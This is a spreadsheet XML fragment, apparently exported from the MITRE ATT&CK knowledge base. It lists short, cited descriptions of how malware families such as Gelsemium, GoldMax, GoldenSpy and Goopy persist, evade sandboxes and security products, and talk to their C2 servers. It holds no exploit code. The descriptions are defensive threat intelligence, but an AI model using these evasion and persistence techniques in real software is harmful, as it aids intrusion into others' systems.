  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use multiple domains and protocols in C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--a01e5280-ae4f-4edd-bb57-e29e8426cc3b</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can delete its dropper component from the targeted system.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--27857b33-3c5d-4f27-9d61-d70da097fd84</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can retrieve data from specific Windows directories, as well as open random files as part of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497).(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--75f2e135-5c45-4b27-a7dc-f62e68f6a5ce</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can store its components in the Registry.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--4fba775c-148d-4fc5-b56a-d5600b23654d</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can download additional plug-ins to a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--9548ed41-931a-4d95-8256-b3fcad5914ad</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has used unverified signatures on malicious DLLs.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--dc9643aa-7b61-4cb1-b181-3d88c0e9742a</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has named malicious binaries `serv.exe`, `winprint.dll`, and `chrome_elf.dll` and has set its persistence in the Registry with the key value &lt;code&gt;Chrome Update&lt;/code&gt; to appear legitimate.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--f49cdf8b-a093-4f24-8b22-d0489756cc0d</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can modify the Registry to store its components.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--516712db-0e82-43a5-bd9f-f1a4cb4939c1</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to use various Windows API functions to perform tasks.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--cca0dc19-ea37-4502-b2d4-7ce09f07be72</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to use TCP and UDP in C2 communications.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--1aee2c50-660a-42ee-816d-5823ade525f3</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to compress its components.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--e46d31bf-23d8-4464-96e8-aee04f745921</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can drop itself in &lt;code&gt;C:\Windows\System32\spool\prtprocs\x64\winprint.dll&lt;/code&gt; to be loaded automatically by the spoolsv Windows service.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--2b364611-0df2-4f12-9122-089ec49ec2e6</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can enumerate running processes.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--5d81254d-9a66-49ea-9635-187da26d4a97</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can open random files and Registry keys to obscure malware behavior from sandbox analysis.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--c6a7e9fe-cdf3-451a-b97f-788b5839606c</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use custom shellcode to map embedded DLLs into memory.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--28e6612e-5f92-42b0-b722-a49a43a75908</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can set persistence with a Registry run key.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--2dde8a3e-773e-4a7f-82e4-dbcaa8cb94c8</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can check for the presence of specific security products.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--8e140ad6-3e95-41fb-893d-644316fdccbf</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can determine the operating system and whether a targeted machine has a 32 or 64 bit architecture.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--86b8a22d-66c3-4b54-82fd-662455d0e2c5</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to distinguish between a standard user and an administrator on a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--9718f2c1-99f3-4fa2-8293-44f2b30bba70</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to perform timestomping of files on targeted systems.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--bf3726ed-c160-4f94-9b48-65a7da2a4ed3</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use junk code to generate random activity to obscure malware behavior.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--4f7680e9-3dd7-4365-a1cc-75342808e2c2</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use HTTP/S in C2 communications.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--cf13b1fe-9653-4256-8ca9-d736470d53ec</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use a batch script to delete itself.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--d35ccc13-9b62-4879-b625-7d15c9a8c981</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can drop itself in `C:\Windows\System32\spool\prtprocs\x64\winprint.dll` as an alternative Print Processor to be loaded automatically when the spoolsv Windows service starts.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--1e345391-ccd8-49c9-9520-496070670e6c</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</si>
  <si>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</si>
  <si>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relationship--1b3cc0cb-de43-405b-bfa5-f0bececabf8c</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on local user accounts from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--2e69a835-6443-455e-8ff0-775bb8c823f1</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on running processes and environment variables from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--3363ae54-1fe3-4c9f-b074-79dc0d7fbba5</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on network settings and Internet proxy settings from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--847752f4-59a2-46e9-ae28-befe0142b223</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on programs and services on the victim that are configured to automatically run at startup.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--ae9befd5-d8b7-4492-9b47-422a40d610cc</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--b5a1cf65-c128-4d2e-bd28-54514d1a3aae</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to run executables with command-line arguments.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--c14e629a-c0cd-4600-873b-924d04d8b627</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to inject DLLs into processes.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--5a0db1e3-cd18-4f00-936b-4b8ede1e0498</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify running processes on an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--6118a138-c13c-4117-97dd-c3e7ec3e1021</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the computer name and Windows version of an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--9c4281ea-b225-44b4-b460-255e51586598</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the current username of an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--d56e3076-7221-4e3b-8628-d8c50982892d</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to use HTTP to send information collected from an infected host to C2.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--db9384b2-ea34-4dd9-8554-e01b1606e7ce</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) encrypts data using Base64 before being sent to the command and control server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--7ee9b1ad-7f7b-4ae7-8cf4-8ab97b6a74b8</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) terminates anti-malware processes if they’re found running on the system.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--a99f7b3c-4757-47b0-8649-795f1e0f7c60</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) deletes one of its files, 2.hwp, from the endpoint after establishing persistence.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--28084f31-80be-472b-bd15-6945b2905a93</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) lists the directories for Desktop, program files, and the user’s recently accessed files.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--b106375b-8359-41fa-b979-c883fa827346</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) can download additional components from the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--47880b58-f0e2-4898-a218-6df6333329ed</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) stores information gathered from the endpoint in a file named 1.hwp.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--74edb7f4-4c3b-4573-abb0-c4842032b6c3</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) checks the running processes on the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--8481804a-2dc2-4e58-8515-1f3d1323f33e</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) enumerates registry keys with the command &lt;code&gt;regkeyenum&lt;/code&gt; and obtains information for the Registry key &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--f8705660-10d1-4eca-80c6-f2884cdecb36</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) establishes persistence in the Startup folder.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--750ca5b8-6142-46c0-9c40-f04dc9036bb9</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) checks for anti-malware products and processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--df4b0683-e6a7-4da4-9544-c6eded007412</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) collects endpoint information using the &lt;code&gt;systeminfo&lt;/code&gt; command.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--c1544dec-4586-466a-b730-862c06e9e3c7</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--41634cea-6236-4013-bda3-345bcba4f40f</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) uses HTTP for communication to the control servers.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--c233f12f-cfa1-4f2a-ba56-ca1980806f4e</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) uses cmd.exe to execute commands for discovery.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--bc8f14a1-dc24-42cb-a0dd-3cc0c25d5eae</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</si>
  <si>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</si>
  <si>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relationship--b98063a7-6649-429f-8376-4d59499e7674</t>
  </si>
  <si>
    <t>10 April 2021</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--001ecf24-8276-40d2-ba05-2d20e5c53ec9</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) has used HTTP for C2.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--e436db66-3617-4c72-8e63-9d6ab0e4c3d5</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has RSA-encrypted its communication with the C2 server.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--7962fea5-a94d-4bb3-b951-fb8726bc4f67</t>
  </si>
  <si>
    <t>The [GoldMax](https://attack.mitre.org/software/S0588) Linux variant has used a crontab entry with a &lt;code&gt;@reboot&lt;/code&gt; line to gain persistence.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--67f336eb-31e7-4904-9ed4-07ca68cd3838</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has decoded and decrypted the configuration file when executed.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>relationship--99e6e6cb-c19e-4689-8c92-b5429c709b91</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can exfiltrate files over the existing C2 channel.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>relationship--dd06ea48-6dde-4753-8f2b-c2fb56bea4f4</t>
  </si>
  <si>
    <t>The [GoldMax](https://attack.mitre.org/software/S0588) Linux variant has been executed with the `nohup` command to ignore hangup signals and continue to run if the terminal session was terminated.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--270284ac-af4d-47dc-9218-26fbecd2ed9a</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can download and execute additional files.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>relationship--bb1a7fc8-bec0-4655-bbfe-0c786e237452</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used decoy traffic to surround its malicious network traffic to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--a6a4bbf3-7a2e-46ae-877a-614bf9f81644</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has impersonated systems management software to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--f3a6ce37-9b55-481f-9dc2-8de69f77a674</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</si>
  <si>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</si>
  <si>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relationship--bf672181-ef16-4d3a-a587-9ac82ac87b8a</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has written AES-encrypted and Base64-encoded configuration files to disk.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>relationship--ae8e960c-3842-4dd5-abab-31d35c0fd1fd</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used scheduled tasks to maintain persistence.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--005b6fd1-be80-424b-b6df-2ff88d390b1b</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has been packed for obfuscation.(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>relationship--0bb1573c-f30f-449c-931e-c5de024e96f8</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) will check if it is being run in a virtualized environment by comparing the collected MAC address to &lt;code&gt;c8:27:cc:c2:37:5a&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>relationship--d7a5d884-d3d9-48c8-915f-75d29d4b259e</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) retrieved a list of the system's network interface after execution.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--57ac1c4f-03fb-4b9e-a4b3-21eb76e7e305</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</si>
  <si>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</si>
  <si>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relationship--2ff84270-830f-4de8-b93c-4ee3a9a46781</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has set an execution trigger date and time, stored as an ASCII Unix/Epoch time value.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--cbc18998-67f4-493a-b0d3-4aa50da3c407</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>relationship--b3dbb1d8-2404-4514-8ae7-f0f58b198fb0</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can spawn a command shell, and execute native commands.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>relationship--9818aba3-86c8-416b-ab47-dc160c80b931</t>
  </si>
  <si>
    <t>S0493</t>
  </si>
  <si>
    <t>GoldenSpy</t>
  </si>
  <si>
    <t>malware--b9704a7d-feef-4af9-8898-5280f1686326</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has been packaged with a legitimate tax preparation software.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>relationship--6edbc35f-fc02-43ba-84d2-17ff8100f094</t>
  </si>
  <si>
    <t>19 August 2020</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) has exfiltrated host environment information to an external C2 domain via port 9006.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>relationship--5409a62e-d298-4026-8829-550306e8e4a6</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller can delete registry entries, files and folders, and finally itself once these tasks have been completed.(Citation: Trustwave GoldenSpy2 June 2020)</t>
  </si>
  <si>
    <t>relationship--8c2a7700-2054-4db1-b566-391f23a9f30a</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</si>
  <si>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</si>
  <si>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relationship--7f499274-44b7-4415-a8e8-6b2134a7873e</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) constantly attempts to download and execute files from the remote C2, including [GoldenSpy](https://attack.mitre.org/software/S0493) itself if not found on the system.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>relationship--b6d77871-1b71-4b65-b04b-9ee1d4b80a9c</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) can create new users on an infected system.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>relationship--172e2d4d-5739-40d3-ae0d-4bf76890e79f</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493)'s setup file installs initial executables under the folder &lt;code&gt;%WinDir%\System32\PluginManager&lt;/code&gt;.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>relationship--7023af7e-91e0-4d7a-852e-ac7299820daa</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands in the Windows command shell using the &lt;code&gt;WinExec()&lt;/code&gt; API.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>relationship--7b9bc78d-87b4-46a7-a5f9-73060535c47d</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>relationship--2243acac-6401-41df-b658-2a36f7977d15</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller has base64-encoded its variables. (Citation: Trustwave GoldenSpy2 June 2020)</t>
  </si>
  <si>
    <t>relationship--d4962990-8bb3-46b9-9ca3-c946fd6ce07e</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) has gathered operating system information.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>relationship--1489f01c-fe49-4332-99e2-d72c487403b6</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493)'s installer has delayed installation of [GoldenSpy](https://attack.mitre.org/software/S0493) for two hours after it reaches a victim system.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>relationship--bd289f02-1354-423e-b5e4-7aca35ec9d8a</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has used the Ryeol HTTP Client to facilitate HTTP internet communication.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>relationship--8ff83164-9bab-4fb5-8e6f-740f90829974</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands via the command-line interface.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>relationship--7c755f6c-11a3-43f7-9117-d25694338a3a</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) has established persistence by running in the background as an autostart service.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>relationship--0fee7bbd-8d36-48e2-b800-9d2f02c06123</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has had null characters padded in its malicious DLL payload.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--fb5fc8e3-2dd8-49de-bd9a-ee19c2f7ef7f</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to delete emails used for C2 once the content has been copied.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--baa60d8d-eff3-45d5-863a-b87ce3c7b468</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--cbf9284f-2f47-4d1f-b708-861b0e1e85b5</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over DNS.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--00aa618f-bcfa-4649-8436-134f9d01e43c</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate documents from infected systems.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--bd2312fb-51ff-4766-a24f-1f5911457bc6</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has used a polymorphic decryptor to decrypt itself at runtime.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--c9aa1bb6-874a-4de6-84c8-e1e9d1d112d0</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to disable Microsoft Outlook's security policies to disable macro warnings.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--82a053be-71c5-49d5-b1f9-9cf979511e85</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate data over the Microsoft Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--db296410-83e6-4716-af90-ae4b7e7f3171</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--c81124ac-5df7-4443-9760-95208d19e599</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--e8edf0d8-3c24-4082-9177-1bfb6e7d95c6</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to  enumerate the infected system's user name via &lt;code&gt;GetUserNameW&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--c6c9fa0e-988e-4c14-a30f-d6576572a2d9</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477)'s decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--6bf3a83b-d66d-4b6a-972c-c348686ebecb</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has checked for the Google Updater process to ensure [Goopy](https://attack.mitre.org/software/S0477) was loaded properly.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--afffac16-cc57-4b01-8325-d88ab73454e1</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to maintain persistence by creating scheduled tasks set to run every hour.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--f230afd5-2186-4d97-94ce-5ce3face8bc6</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to enumerate the infected system's user name.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--80e484a4-e5b5-4de1-81c7-2bd1a927d156</t>
  </si>
  <si>
    <t>relationship--097a4294-e9e6-46a1-8ecb-06ab0b00d773</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over HTTP.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--8e17260d-d028-4d6b-9a45-4e767ecb88c3</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--7d1e24d5-1405-4ade-a4f3-ddb946b46783</t>
  </si>
  <si>
    <t>S0531</t>
  </si>
  <si>
    <t>Grandoreiro</t>
  </si>
  <si>
    <t>malware--958b5d06-8bb0-4c5b-a2e7-0130fe654ac7</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on window names.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--5adc78d2-a013-4a4e-afda-9a7dd38fb5fa</t>
  </si>
  <si>
    <t>13 November 2020</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use SSL in C2 communication.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--2843712c-cf5a-45f0-9e08-444665e0d479</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can utilize web services including Google sites to send and receive C2 data.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--30e68a86-bbfc-4677-9815-b256be560f09</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has added BMP images to the resources section of its Portable Executable (PE) file increasing each binary to at least 300MB in size.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>relationship--6ab65410-25e5-4eef-8a38-06630aa4386b</t>
  </si>
  <si>
